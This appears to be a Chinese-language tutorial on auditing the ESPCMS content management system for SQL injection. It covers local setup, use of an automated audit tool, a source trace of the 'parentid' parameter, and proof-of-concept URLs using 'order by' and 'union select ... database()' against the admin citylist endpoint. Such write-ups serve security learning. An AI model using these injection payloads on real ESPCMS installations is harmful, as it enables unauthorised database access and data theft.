0X01 CMS环境搭建(espcms)
下载地址
下载后解压到WWW目录下
浏览器访问http://127.0.0.1/espcms/upload/index.php进行安装
设置相关信息
安装完成,进行登录
正常访问,完成搭建
0X02 自动化审计工具
作者网站现在已经无法访问:http://www.cnseay.com/
github下载地址
CSDN下载地址
点击“新建项目”,打开espcms目录,再点:自动审计->开始
0X03 直接挖掘select注入
已这条漏洞提示为例
双击达到位置
parentid是通过accept函数获得的,我们定位函数
看到有两条路径
通过双击查看,发现有一个提交参数过滤机制,定位函数
找到函数
判断这不是一个字符注入
接下来执行函数,首先对important类进行全局搜索
看到第一条路径是初始化,双击打开
分析源码
首先获得archive,如果为空就使用adminuser
action同理
也就是说函数在citylist下获得内容,传参为parentid
构造url,访问index.php进行测试
0X04 漏洞验证POC
url 测试
http://127.0.0.1/espcms/upload/adminsoft/index.php?archive=citylist&action=citylist&parentid=1
http://127.0.0.1/espcms/upload/adminsoft/index.php?archive=citylist&action=citylist&parentid=1%20order%20by%206
http://127.0.0.1/espcms/upload/adminsoft/index.php?archive=citylist&action=citylist&parentid=-1%20union%20select%201,2,3,4,5
http://127.0.0.1/espcms/upload/adminsoft/index.php?archive=citylist&action=citylist&parentid=-1%20union%20select%201,2,database(),4,5
-----E-----N-----D-----
😄如有问题,请各位师傅斧正,你的支持是我最大的动力。